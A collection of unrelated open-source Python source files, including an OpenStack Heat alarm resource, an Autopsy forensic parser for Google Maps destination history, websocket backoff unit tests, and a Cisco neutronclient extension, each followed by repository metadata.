for m_k, m_v in six.iteritems(mmd):
if m_k.startswith('metadata.%s' % prefix):
key = m_k
elif m_k.startswith(prefix):
key = 'metadata.%s' % m_k
else:
key = 'metadata.%s%s' % (prefix, m_k)
            # NOTE(prazumovsky): the query value must be a string, but a
            # matching_metadata value may be of any other type, so convert
            # it to a string explicitly.
query.append(dict(field=key, op='eq', value=six.text_type(m_v)))
if self.MATCHING_METADATA in kwargs:
del kwargs[self.MATCHING_METADATA]
if self.QUERY in kwargs:
del kwargs[self.QUERY]
if query:
rule['query'] = query
kwargs['threshold_rule'] = rule
return kwargs
def handle_create(self):
props = self.cfn_to_ceilometer(self.stack,
self.properties)
props['name'] = self.physical_resource_name()
alarm = self.ceilometer().alarms.create(**props)
self.resource_id_set(alarm.alarm_id)
        # the watchrule below is for backwards compatibility.
        # 1) so we don't create watch tasks unnecessarily
        # 2) to support CW stats post, we will redirect the request
        #    to ceilometer.
wr = watchrule.WatchRule(context=self.context,
watch_name=self.physical_resource_name(),
rule=self.parsed_template('Properties'),
stack_id=self.stack.id)
wr.state = wr.CEILOMETER_CONTROLLED
wr.store()
def handle_update(self, json_snippet, tmpl_diff, prop_diff):
if prop_diff:
kwargs = {'alarm_id': self.resource_id}
kwargs.update(self.properties)
kwargs.update(prop_diff)
alarms_client = self.ceilometer().alarms
alarms_client.update(**self.cfn_to_ceilometer(self.stack, kwargs))
def handle_suspend(self):
if self.resource_id is not None:
self.ceilometer().alarms.update(alarm_id=self.resource_id,
enabled=False)
def handle_resume(self):
if self.resource_id is not None:
self.ceilometer().alarms.update(alarm_id=self.resource_id,
enabled=True)
def handle_delete(self):
try:
wr = watchrule.WatchRule.load(
self.context, watch_name=self.physical_resource_name())
wr.destroy()
except exception.WatchRuleNotFound:
pass
if self.resource_id is not None:
try:
self.ceilometer().alarms.delete(self.resource_id)
except Exception as ex:
self.client_plugin().ignore_not_found(ex)
def handle_check(self):
watch_name = self.physical_resource_name()
watchrule.WatchRule.load(self.context, watch_name=watch_name)
self.ceilometer().alarms.get(self.resource_id)
class BaseCeilometerAlarm(resource.Resource):
default_client_name = 'ceilometer'
def handle_create(self):
properties = actions_to_urls(self.stack,
self.properties)
properties['name'] = self.physical_resource_name()
properties['type'] = self.ceilometer_alarm_type
alarm = self.ceilometer().alarms.create(
**self._reformat_properties(properties))
self.resource_id_set(alarm.alarm_id)
def _reformat_properties(self, properties):
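        # Move the type-specific properties under a '<type>_rule' key, as the
        # ceilometer alarm API expects; e.g. for a combination alarm
        # (illustrative) {'alarm_ids': [...], 'operator': 'and'} becomes
        # {'combination_rule': {'alarm_ids': [...], 'operator': 'and'}}.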
rule = {}
for name in self.PROPERTIES:
value = properties.pop(name, None)
if value:
rule[name] = value
if rule:
properties['%s_rule' % self.ceilometer_alarm_type] = rule
return properties
def handle_update(self, json_snippet, tmpl_diff, prop_diff):
if prop_diff:
kwargs = {'alarm_id': self.resource_id}
kwargs.update(prop_diff)
alarms_client = self.ceilometer().alarms
alarms_client.update(**self._reformat_properties(
actions_to_urls(self.stack, kwargs)))
def handle_suspend(self):
self.ceilometer().alarms.update(
alarm_id=self.resource_id, enabled=False)
def handle_resume(self):
self.ceilometer().alarms.update(
alarm_id=self.resource_id, enabled=True)
def handle_delete(self):
try:
self.ceilometer().alarms.delete(self.resource_id)
except Exception as ex:
self.client_plugin().ignore_not_found(ex)
def handle_check(self):
self.ceilometer().alarms.get(self.resource_id)
class CombinationAlarm(BaseCeilometerAlarm):
support_status = support.SupportStatus(version='2014.1')
PROPERTIES = (
ALARM_IDS, OPERATOR,
) = (
'alarm_ids', 'operator',
)
properties_schema = {
ALARM_IDS: properties.Schema(
properties.Schema.LIST,
_('List of alarm identifiers to combine.'),
required=True,
constraints=[constraints.Length(min=1)],
update_allowed=True),
OPERATOR: properties.Schema(
properties.Schema.STRING,
_('Operator used to combine the alarms.'),
constraints=[constraints.AllowedValues(['and', 'or'])],
update_allowed=True)
}
properties_schema.update(common_properties_schema)
ceilometer_alarm_type = 'combination'
def resource_mapping():
return {
'OS::Ceilometer::Alarm': CeilometerAlarm,
'OS::Ceilometer::CombinationAlarm': CombinationAlarm,
}
|
pshchelo/heat
|
heat/engine/resources/openstack/ceilometer/alarm.py
|
Python
|
apache-2.0
| 14,721
|
"""
Autopsy Forensic Browser
Copyright 2016-2018 Basis Technology Corp.
Contact: carrier <at> sleuthkit <dot> org
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
from java.io import File
from java.lang import Class
from java.lang import ClassNotFoundException
from java.lang import Double
from java.lang import Long
from java.sql import Connection
from java.sql import DriverManager
from java.sql import ResultSet
from java.sql import SQLException
from java.sql import Statement
from java.util.logging import Level
from java.util import ArrayList
from org.sleuthkit.autopsy.casemodule import Case
from org.sleuthkit.autopsy.casemodule import NoCurrentCaseException
from org.sleuthkit.autopsy.casemodule.services import FileManager
from org.sleuthkit.autopsy.coreutils import Logger
from org.sleuthkit.autopsy.coreutils import MessageNotifyUtil
from org.sleuthkit.autopsy.datamodel import ContentUtils
from org.sleuthkit.autopsy.ingest import IngestJobContext
from org.sleuthkit.datamodel import AbstractFile
from org.sleuthkit.datamodel import Blackboard
from org.sleuthkit.datamodel import BlackboardArtifact
from org.sleuthkit.datamodel import BlackboardAttribute
from org.sleuthkit.datamodel import Content
from org.sleuthkit.datamodel import TskCoreException
from org.sleuthkit.datamodel.Blackboard import BlackboardException
from org.sleuthkit.datamodel.blackboardutils import GeoArtifactsHelper
from org.sleuthkit.datamodel.blackboardutils.attributes import GeoWaypoints
from org.sleuthkit.datamodel.blackboardutils.attributes.GeoWaypoints import Waypoint
import traceback
import general
"""
Finds and parses the Google Maps database.
"""
class GoogleMapLocationAnalyzer(general.AndroidComponentAnalyzer):
def __init__(self):
self._logger = Logger.getLogger(self.__class__.__name__)
self.current_case = None
self.PROGRAM_NAME = "Google Maps History"
self.CAT_DESTINATION = "Destination"
def analyze(self, dataSource, fileManager, context):
try:
self.current_case = Case.getCurrentCaseThrows()
except NoCurrentCaseException as ex:
self._logger.log(Level.WARNING, "No case currently open.", ex)
self._logger.log(Level.WARNING, traceback.format_exc())
return
try:
absFiles = fileManager.findFiles(dataSource, "da_destination_history")
if absFiles.isEmpty():
return
for abstractFile in absFiles:
try:
jFile = File(self.current_case.getTempDirectory(), str(abstractFile.getId()) + abstractFile.getName())
ContentUtils.writeToFile(abstractFile, jFile, context.dataSourceIngestIsCancelled)
self.__findGeoLocationsInDB(jFile.toString(), abstractFile)
except Exception as ex:
self._logger.log(Level.SEVERE, "Error parsing Google map locations", ex)
self._logger.log(Level.SEVERE, traceback.format_exc())
except TskCoreException as ex:
# Error finding Google map locations.
pass
def __findGeoLocationsInDB(self, databasePath, abstractFile):
if not databasePath:
return
try:
artifactHelper = GeoArtifactsHelper(self.current_case.getSleuthkitCase(),
general.MODULE_NAME, self.PROGRAM_NAME, abstractFile)
Class.forName("org.sqlite.JDBC") # load JDBC driver
connection = DriverManager.getConnection("jdbc:sqlite:" + databasePath)
statement = connection.createStatement()
except (ClassNotFoundException) as ex:
self._logger.log(Level.SEVERE, "Error loading JDBC driver", ex)
self._logger.log(Level.SEVERE, traceback.format_exc())
return
except (SQLException) as ex:
# Error opening database.
return
resultSet = None
try:
resultSet = statement.executeQuery(
"SELECT time, dest_lat, dest_lng, dest_title, dest_address, source_lat, source_lng FROM destination_history;")
while resultSet.next():
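                # Convert the stored timestamp from milliseconds to seconds
                # (hence the division by 1000).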
time = Long.valueOf(resultSet.getString("time")) / 1000
dest_title = resultSet.getString("dest_title")
dest_address = resultSet.getString("dest_address")
dest_lat = GoogleMapLocationAnalyzer.convertGeo(resultSet.getString("dest_lat"))
dest_lng = GoogleMapLocationAnalyzer.convertGeo(resultSet.getString("dest_lng"))
source_lat = GoogleMapLocationAnalyzer.convertGeo(resultSet.getString("source_lat"))
source_lng = GoogleMapLocationAnalyzer.convertGeo(resultSet.getString("source_lng"))
waypointlist = GeoWaypoints()
waypointlist.addPoint(Waypoint(source_lat, source_lng, None, None))
waypointlist.addPoint(Waypoint(dest_lat, dest_lng, None, dest_address))
artifactHelper.addRoute(dest_title, time, waypointlist, None)
except SQLException as ex:
# Unable to execute Google map locations SQL query against database.
pass
except TskCoreException as ex:
self._logger.log(Level.SEVERE, "Failed to add route artifacts.", ex)
self._logger.log(Level.SEVERE, traceback.format_exc())
except BlackboardException as ex:
self._logger.log(Level.WARNING, "Failed to post artifacts.", ex)
self._logger.log(Level.WARNING, traceback.format_exc())
except Exception as ex:
self._logger.log(Level.SEVERE, "Error processing google maps history.", ex)
self._logger.log(Level.SEVERE, traceback.format_exc())
finally:
try:
if resultSet is not None:
resultSet.close()
statement.close()
connection.close()
except Exception as ex:
# Error closing the database.
pass
    # Insert a decimal point six digits from the end of the string
    # (coordinates are stored as integers scaled by 10^6).
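    # e.g. convertGeo("37422006") -> 37.422006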
@staticmethod
def convertGeo(s):
length = len(s)
if length > 6:
return Double.valueOf(s[0 : length-6] + "." + s[length-6 : length])
else:
return Double.valueOf(s)
|
wschaeferB/autopsy
|
InternalPythonModules/android/googlemaplocation.py
|
Python
|
apache-2.0
| 6,752
|
# -*- coding:utf-8 -*-
# Copyright 2015 NEC Corporation. #
# #
# Licensed under the Apache License, Version 2.0 (the "License"); #
# you may not use this file except in compliance with the License. #
# You may obtain a copy of the License at #
# #
# http://www.apache.org/licenses/LICENSE-2.0 #
# #
# Unless required by applicable law or agreed to in writing, software #
# distributed under the License is distributed on an "AS IS" BASIS, #
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. #
# See the License for the specific language governing permissions and #
# limitations under the License. #
class ConversionTable(object):
def __init__(self):
self.__connection_type_map = {}
self.__network_conversion_table = {}
self.__node_conversion_table = {}
self.__port_conversion_table = {}
self.__link_conversion_table = {}
self.__flow_conversion_table = {}
def get_connection_type(self, connection_id):
if connection_id in self.__connection_type_map:
return self.__connection_type_map[connection_id]
return None
def get_connection_list(self, connection_type):
connection_ids = []
for k_conn_id, v_conn_type in self.__connection_type_map.items():
if connection_type == v_conn_type:
connection_ids.append(k_conn_id)
return connection_ids
def is_connection_type(self, connection_type):
if connection_type is None or\
len(self.get_connection_list(connection_type)) == 0:
return False
return True
def add_entry_connection_type(self, connection_id, connection_type):
self.__connection_type_map[connection_id] = connection_type
def del_entry_connection_type(self, connection_id):
        if connection_id in self.__connection_type_map:
del self.__connection_type_map[connection_id]
def get_network(self, network_id):
networks = []
if network_id in self.__network_conversion_table:
networks = self.__network_conversion_table[network_id]
return networks
def get_node(self, network_id, node_id):
nodes = []
key = network_id + "::" + node_id
if key in self.__node_conversion_table:
nodes = self.__node_conversion_table[key]
return nodes
def get_port(self, network_id, node_id, port_id):
ports = []
key = network_id + "::" + node_id + "::" + port_id
if key in self.__port_conversion_table:
ports = self.__port_conversion_table[key]
return ports
def get_link(self, network_id, link_id):
links = []
key = network_id + "::" + link_id
if key in self.__link_conversion_table:
links = self.__link_conversion_table[key]
return links
def get_flow(self, network_id, flow_id):
flows = []
key = network_id + "::" + flow_id
if key in self.__flow_conversion_table:
flows = self.__flow_conversion_table[key]
return flows
def add_entry_network(self, nwc_id_1, nwc_id_2):
self.__add_entry_object(self.__network_conversion_table,
nwc_id_1,
nwc_id_2)
def add_entry_node(self, org_nwc_id, org_node_id,
rep_nwc_id, rep_node_id):
key = org_nwc_id + "::" + org_node_id
value = rep_nwc_id + "::" + rep_node_id
self.__add_entry_object(self.__node_conversion_table,
key,
value)
def add_entry_port(self, org_nwc_id, org_node_id, org_port_id,
rep_nwc_id, rep_node_id, rep_port_id):
key = org_nwc_id + "::" + org_node_id + "::" + org_port_id
value = rep_nwc_id + "::" + rep_node_id + "::" + rep_port_id
self.__add_entry_object(self.__port_conversion_table,
key,
value)
def add_entry_link(self, org_nwc_id, org_link_id,
rep_nwc_id, rep_link_id):
key = org_nwc_id + "::" + org_link_id
value = rep_nwc_id + "::" + rep_link_id
self.__add_entry_object(self.__link_conversion_table,
key,
value)
def add_entry_flow(self, org_nwc_id, org_flow_id,
rep_nwc_id, rep_flow_id):
key = org_nwc_id + "::" + org_flow_id
value = rep_nwc_id + "::" + rep_flow_id
self.__add_entry_object(self.__flow_conversion_table,
key,
value)
def __add_entry_object(self, conv_table_obj, key, value):
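        # Entries are stored in both directions; e.g. (illustrative)
        # add_entry_network("nw1", "nw2") results in
        # {"nw1": ["nw2"], "nw2": ["nw1"]}, so either id resolves to the other.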
# key setting
if key not in conv_table_obj:
conv_table_obj[key] = []
conv_table_obj[key].append(value)
        # value -> key setting (reverse setting)
if value not in conv_table_obj:
conv_table_obj[value] = []
conv_table_obj[value].append(key)
def del_entry_network(self, key):
self.__del_entry_object(self.__network_conversion_table, key)
def del_entry_node(self, network_id, node_id):
        # delete all port entries belonging to this node before
        # removing the node itself (Port => Node).
del_port_list = []
for port_id in self.__port_conversion_table:
port_list = port_id.split("::")
if port_list[0] == network_id and\
port_list[1] == node_id:
del_port_list.append(port_id)
for port_id in del_port_list:
self.__del_entry_object(self.__port_conversion_table,
port_id)
key = network_id + "::" + node_id
self.__del_entry_object(self.__node_conversion_table, key)
def del_entry_port(self, network_id, node_id, port_id):
key = network_id + "::" + node_id + "::" + port_id
self.__del_entry_object(self.__port_conversion_table, key)
def del_entry_link(self, network_id, link_id):
key = network_id + "::" + link_id
self.__del_entry_object(self.__link_conversion_table, key)
def del_entry_flow(self, network_id, flow_id):
key = network_id + "::" + flow_id
self.__del_entry_object(self.__flow_conversion_table, key)
def __del_entry_object(self, conv_table_obj, key):
if key not in conv_table_obj:
return
# value -> key remove(reverse setting remove)
reverse_keys = conv_table_obj[key]
for reverse_key in reverse_keys:
if reverse_key not in conv_table_obj:
continue
if len(conv_table_obj[reverse_key]) > 1:
conv_table_obj[reverse_key].remove(key)
continue
del conv_table_obj[reverse_key]
del conv_table_obj[key]
|
nis-sdn/odenos
|
src/main/python/org/o3project/odenos/core/component/conversion_table.py
|
Python
|
apache-2.0
| 7,233
|
# Copyright 2015 Mirantis, Inc.
# Copyright 2012-2013 IBM Corp.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import setuptools
setuptools.setup(
setup_requires=['pbr'],
pbr=True)
|
Mirantis/vmware-firewall-driver
|
setup.py
|
Python
|
apache-2.0
| 738
|
#
# Copyright (C) 2014 Dell, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import datetime
import math
import mock
import time
import unittest
import dcm.agent.connection.websocket as websocket
import dcm.agent.handshake as handshake
import dcm.agent.tests.utils.general as test_utils
from dcm.agent.events.globals import global_space as dcm_events
def fake_incoming_message(incoming_doc):
pass
class TestBackoff(unittest.TestCase):
@classmethod
def setUpClass(cls):
test_utils.connect_to_debugger()
def run_with_connect_errors(
self,
backoff_seconds,
max_backoff_seconds,
run_time_seconds,
conn_obj):
class FakeHS(object):
def get_send_document(self):
ws.throw_error(Exception("just for tests"))
return {}
def incoming_document(self, incoming_doc):
return handshake.HandshakeIncomingReply(
handshake.HandshakeIncomingReply.REPLY_CODE_SUCCESS)
m = mock.Mock()
conn_obj.return_value = m
server_url = "wss://notreal.com"
ws = websocket.WebSocketConnection(
server_url,
backoff_amount=int(backoff_seconds*1000),
max_backoff=int(max_backoff_seconds*1000))
ws.connect(fake_incoming_message, FakeHS())
nw = datetime.datetime.now()
done_time = nw + datetime.timedelta(seconds=run_time_seconds)
while done_time > nw:
remaining = done_time - nw
dcm_events.poll(timeblock=remaining.total_seconds())
nw = datetime.datetime.now()
ws.close()
return m
@mock.patch('dcm.agent.connection.websocket._WebSocketClient')
def test_no_retry(self, conn_obj):
"""Make sure that just 1 connect happens when waiting less than the
backoff time"""
m = mock.Mock()
conn_obj.return_value = m
backoff_seconds = 3.0
max_backoff_seconds = backoff_seconds * 100.0 # just make a big number
        run_time_seconds = backoff_seconds / 2.0  # less than the backoff
m = self.run_with_connect_errors(
backoff_seconds,
max_backoff_seconds,
run_time_seconds,
conn_obj)
self.assertEqual(1, m.connect.call_count)
@mock.patch('dcm.agent.connection.websocket._WebSocketClient')
def test_retry_connections(self, conn_obj):
"""Make sure reconnections happen"""
m = mock.Mock()
conn_obj.return_value = m
initial_backoff_seconds = 0.5
max_backoff_seconds = 600.0
run_time_seconds = 5.0
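        # Assuming the connection backoff roughly doubles after each failed
        # attempt, about log2(run_time / initial_backoff) reconnects fit in
        # the window; the assertions below allow a +/-2 margin.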
expected_backoff_count =\
int(math.log(run_time_seconds / initial_backoff_seconds, 2))
m = self.run_with_connect_errors(
initial_backoff_seconds,
max_backoff_seconds,
run_time_seconds,
conn_obj)
self.assertLessEqual(expected_backoff_count-2, m.connect.call_count)
self.assertGreaterEqual(expected_backoff_count+2, m.connect.call_count)
@mock.patch('dcm.agent.connection.websocket._WebSocketClient')
def test_retry_connections_never_more_than_max_back(self, conn_obj):
m = mock.Mock()
conn_obj.return_value = m
initial_backoff_seconds = 5.0
max_backoff_seconds = 0.1
run_time_seconds = 3.0
expected_backoff_count = run_time_seconds / max_backoff_seconds
m = self.run_with_connect_errors(
initial_backoff_seconds,
max_backoff_seconds,
run_time_seconds,
conn_obj)
self.assertGreaterEqual(expected_backoff_count, m.connect.call_count)
@mock.patch('dcm.agent.connection.websocket._WebSocketClient')
def test_force_backoff(self, conn_obj):
        # force the backoff to be longer than the max run time, then make
        # sure that connect is only called once
backoff_seconds = 0.2
max_backoff_seconds = backoff_seconds
run_time_seconds = backoff_seconds * 10.0
force_time = run_time_seconds + 1.0
m = mock.Mock()
conn_obj.return_value = m
server_url = "wss://notreal.com"
ws = websocket.WebSocketConnection(
server_url,
backoff_amount=int(backoff_seconds*1000),
max_backoff=int(max_backoff_seconds*1000))
def send_in_handshake():
ws.event_incoming_message(
{handshake.HandshakeIncomingReply.REPLY_KEY_FORCE_BACKOFF:
force_time,
'return_code':
handshake.HandshakeIncomingReply.REPLY_CODE_FORCE_BACKOFF})
class FakeHS(object):
def get_send_document(self):
dcm_events.register_callback(send_in_handshake)
return {}
def incoming_document(self, incoming_doc):
hs = handshake.HandshakeIncomingReply(
handshake.HandshakeIncomingReply.REPLY_CODE_FORCE_BACKOFF,
force_backoff=force_time)
return hs
ws.connect(fake_incoming_message, FakeHS())
nw = datetime.datetime.now()
done_time = nw + datetime.timedelta(seconds=run_time_seconds)
while done_time > nw:
remaining = done_time - nw
dcm_events.poll(timeblock=remaining.total_seconds())
nw = datetime.datetime.now()
ws.close()
self.assertEqual(1, m.connect.call_count)
def test_backoff_object_ready_immediately(self):
initial_backoff_second = 300.0
max_backoff_seconds = initial_backoff_second
backoff = websocket.Backoff(
max_backoff_seconds,
initial_backoff_second=initial_backoff_second)
self.assertTrue(backoff.ready())
def test_backoff_object_error_not_ready(self):
initial_backoff_second = 300.0
max_backoff_seconds = initial_backoff_second
backoff = websocket.Backoff(
max_backoff_seconds,
initial_backoff_second=initial_backoff_second)
backoff.error()
self.assertFalse(backoff.ready())
def test_backoff_object_error_wait_ready(self):
initial_backoff_second = 0.05
max_backoff_seconds = initial_backoff_second
backoff = websocket.Backoff(
max_backoff_seconds,
initial_backoff_second=initial_backoff_second)
backoff.error()
time.sleep(initial_backoff_second)
self.assertTrue(backoff.ready())
def test_backoff_object_ready_after_many_errors_than_activity(self):
initial_backoff_second = 0.05
max_backoff_seconds = initial_backoff_second
backoff = websocket.Backoff(
max_backoff_seconds,
initial_backoff_second=initial_backoff_second)
backoff.error()
backoff.error()
backoff.error()
backoff.error()
backoff.error()
backoff.error()
self.assertFalse(backoff.ready())
backoff.activity()
self.assertTrue(backoff.ready())
|
JPWKU/unix-agent
|
src/dcm/agent/tests/unit/test_backoff.py
|
Python
|
apache-2.0
| 7,619
|
# Copyright 2017 Predict & Truly Systems All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from .glpi import GlpiService
from .glpi_item import GlpiItem
class KnowBase(GlpiItem):
""" Object of KB """
def __init__(self, attributes={}):
""" Construct an KB Item. """
GlpiItem.__init__(self, {})
defaults = {
"knowbaseitemcategories_id": 0,
"users_id": 2,
"is_faq": 0,
"view": 1
}
self.set_attributes(attributes=attributes)
self.set_attributes(attributes=defaults)
class GlpiKnowBase(GlpiService):
""" Client for GLPI Knowledge Base item """
def __init__(self, url, app_token, username,
password):
""" Construct an instance for Ticket item """
uri = '/Knowbaseitem'
GlpiService.__init__(self, url, app_token, uri,
username=username, password=password)
|
truly-systems/glpi-sdk-python
|
glpi/item_knowbase.py
|
Python
|
apache-2.0
| 1,459
|
from rest_framework import serializers as ser
from api.base.serializers import ShowIfVersion
from api.providers.serializers import PreprintProviderSerializer
class DeprecatedPreprintProviderSerializer(PreprintProviderSerializer):
class Meta:
type_ = 'preprint_providers'
# Deprecated fields
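    # (Each field below is only rendered for requests whose API version falls
    # in the listed range, e.g. 2.0 through 2.3, via the ShowIfVersion wrapper.)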
header_text = ShowIfVersion(
ser.CharField(read_only=True, default=''),
min_version='2.0', max_version='2.3'
)
banner_path = ShowIfVersion(
ser.CharField(read_only=True, default=''),
min_version='2.0', max_version='2.3'
)
logo_path = ShowIfVersion(
ser.CharField(read_only=True, default=''),
min_version='2.0', max_version='2.3'
)
email_contact = ShowIfVersion(
ser.CharField(read_only=True, allow_null=True),
min_version='2.0', max_version='2.3'
)
social_twitter = ShowIfVersion(
ser.CharField(read_only=True, allow_null=True),
min_version='2.0', max_version='2.3'
)
social_facebook = ShowIfVersion(
ser.CharField(read_only=True, allow_null=True),
min_version='2.0', max_version='2.3'
)
social_instagram = ShowIfVersion(
ser.CharField(read_only=True, allow_null=True),
min_version='2.0', max_version='2.3'
)
subjects_acceptable = ShowIfVersion(
ser.ListField(read_only=True, default=[]),
min_version='2.0', max_version='2.4'
)
|
icereval/osf.io
|
api/preprint_providers/serializers.py
|
Python
|
apache-2.0
| 1,430
|
# Copyright 2014 Mirantis, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from nailgun.db import db
from nailgun.db.sqlalchemy import models
from nailgun import consts
from nailgun.objects import NailgunCollection
from nailgun.objects import NailgunObject
from nailgun.objects.serializers.action_log import ActionLogSerializer
class ActionLog(NailgunObject):
#: SQLAlchemy model for ActionLog
model = models.ActionLog
#: Serializer for ActionLog
serializer = ActionLogSerializer
#: JSON schema for ActionLog
schema = {
"$schema": "http://json-schema.org/draft-04/schema#",
"title": "ActionLog",
"description": "Serialized ActionLog object",
"type": "object",
"properties": {
"id": {"type": "number"},
"actor_id": {"type": ["string", "null"]},
"action_group": {"type": "string"},
"action_name": {"type": "string"},
"action_type": {
"type": "string",
"enum": list(consts.ACTION_TYPES)
},
"start_timestamp": {"type": "string"},
"end_timestamp": {"type": "string"},
"additional_info": {"type": "object"},
"is_sent": {"type": "boolean"},
"cluster_id": {"type": ["number", "null"]},
"task_uuid": {"type": ["string", "null"]}
}
}
@classmethod
def update(cls, instance, data):
"""Form additional info for further instance update.
Extend corresponding method of the parent class.
Side effects:
overrides already present keys of additional_info attribute
of instance if this attribute is present in data argument
:param instance: instance of ActionLog class that is processed
:param data: dictionary containing keyword arguments for entity to be
updated
:return: returned by parent class method value
"""
if data.get('additional_info'):
add_info = dict(instance.additional_info)
add_info.update(data['additional_info'])
data['additional_info'] = add_info
return super(ActionLog, cls).update(instance, data)
@classmethod
def get_by_kwargs(cls, **kwargs):
"""Get action_log entry by set of attributes values.
:return: - matching instance of action_log entity
"""
instance = db().query(models.ActionLog)\
.filter_by(**kwargs)\
.first()
return instance
class ActionLogCollection(NailgunCollection):
single = ActionLog
|
nebril/fuel-web
|
nailgun/nailgun/objects/action_log.py
|
Python
|
apache-2.0
| 3,128
|
# Copyright 2015 Cisco Systems.
# All Rights Reserved
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
#
from __future__ import print_function
from networking_cisco._i18n import _
from neutronclient.common import extension
from neutronclient.neutron import v2_0 as neutronV20
from neutronclient.neutron.v2_0 import router
from networking_cisco.neutronclient import hostingdevice
R_RESOURCE = 'router'
DEVICE_L3_ROUTERS = '/hosting-device-l3-routers'
class RoutersOnHostingDevice(extension.NeutronClientExtension):
resource = R_RESOURCE
resource_plural = '%ss' % resource
object_path = '/%s' % resource_plural
resource_path = '/%s/%%s' % resource_plural
versions = ['2.0']
allow_names = True
class AddRouterToHostingDevice(extension.ClientExtensionCreate,
RoutersOnHostingDevice):
"""Add a router to hosting device."""
shell_command = 'cisco-hosting-device-router-add'
def get_parser(self, prog_name):
parser = super(AddRouterToHostingDevice, self).get_parser(prog_name)
parser.add_argument(
'hosting_device',
help=_('Name or id of the hosting device.'))
parser.add_argument(
'router',
help=_('Name or id of router to add.'))
return parser
def execute(self, parsed_args):
self.log.debug('run(%s)' % parsed_args)
neutron_client = self.get_client()
neutron_client.format = parsed_args.request_format
_id_hd = neutronV20.find_resourceid_by_name_or_id(
neutron_client, 'hosting_device', parsed_args.hosting_device)
_id_r = neutronV20.find_resourceid_by_name_or_id(
neutron_client, 'router', parsed_args.router)
self.add_router_to_hosting_device(neutron_client, _id_hd,
{'router_id': _id_r})
print(_('Added router \'%(router)s\' to hosting device \'%(hd)s\'') % {
'router': parsed_args.router, 'hd': parsed_args.hosting_device},
file=self.app.stdout, end='')
return [], []
def add_router_to_hosting_device(self, client, hosting_device_id, body):
"""Adds a router to hosting device."""
res_path = hostingdevice.HostingDevice.resource_path
return client.post((res_path + DEVICE_L3_ROUTERS) %
hosting_device_id, body=body)
class RemoveRouterFromHostingDevice(extension.ClientExtensionCreate,
RoutersOnHostingDevice):
"""Remove a router from Hosting Device."""
shell_command = 'cisco-hosting-device-router-remove'
def get_parser(self, prog_name):
parser = super(RemoveRouterFromHostingDevice, self).get_parser(
prog_name)
parser.add_argument(
'hosting_device',
help=_('Name or id of the hosting device.'))
parser.add_argument(
'router',
help=_('Name or id of router to remove.'))
return parser
def execute(self, parsed_args):
self.log.debug('run(%s)' % parsed_args)
neutron_client = self.get_client()
neutron_client.format = parsed_args.request_format
_id_hd = neutronV20.find_resourceid_by_name_or_id(
neutron_client, 'hosting_device', parsed_args.hosting_device)
_id_r = neutronV20.find_resourceid_by_name_or_id(
neutron_client, 'router', parsed_args.router)
self.remove_router_from_hosting_device(neutron_client, _id_hd, _id_r)
print(_('Removed router \'%(router)s\' from hosting device \'%(hd)s\'')
% {'router': parsed_args.router,
'hd': parsed_args.hosting_device}, file=self.app.stdout,
end='')
return [], []
def remove_router_from_hosting_device(self, client, hosting_device_id,
router_id):
"""Remove a router from hosting_device."""
res_path = hostingdevice.HostingDevice.resource_path
return client.delete((res_path + DEVICE_L3_ROUTERS + "/%s") % (
hosting_device_id, router_id))
class RoutersOnHostingDeviceList(extension.ClientExtensionList,
RoutersOnHostingDevice):
shell_command = 'cisco-hosting-device-list-hosted-routers'
_formatters = {'external_gateway_info':
router._format_external_gateway_info}
list_columns = ['id', 'name', 'external_gateway_info']
def get_parser(self, prog_name):
parser = super(RoutersOnHostingDeviceList, self).get_parser(prog_name)
parser.add_argument(
'hosting_device',
help=_('Name or id of the hosting device to query.'))
return parser
def call_server(self, neutron_client, search_opts, parsed_args):
_id = neutronV20.find_resourceid_by_name_or_id(
neutron_client, 'hosting_device', parsed_args.hosting_device)
data = self.list_routers_on_hosting_device(neutron_client, _id,
**search_opts)
return data
def list_routers_on_hosting_device(self, client, hosting_device_id,
**_params):
"""Fetches a list of routers hosted on a hosting device."""
res_path = hostingdevice.HostingDevice.resource_path
return client.get((res_path + DEVICE_L3_ROUTERS) %
hosting_device_id, params=_params)
HD_RESOURCE = 'hosting_device'
L3_ROUTER_DEVICES = '/l3-router-hosting-devices'
class HostingDeviceHostingRouter(extension.NeutronClientExtension):
resource = HD_RESOURCE
resource_plural = '%ss' % resource
object_path = '/%s' % resource_plural
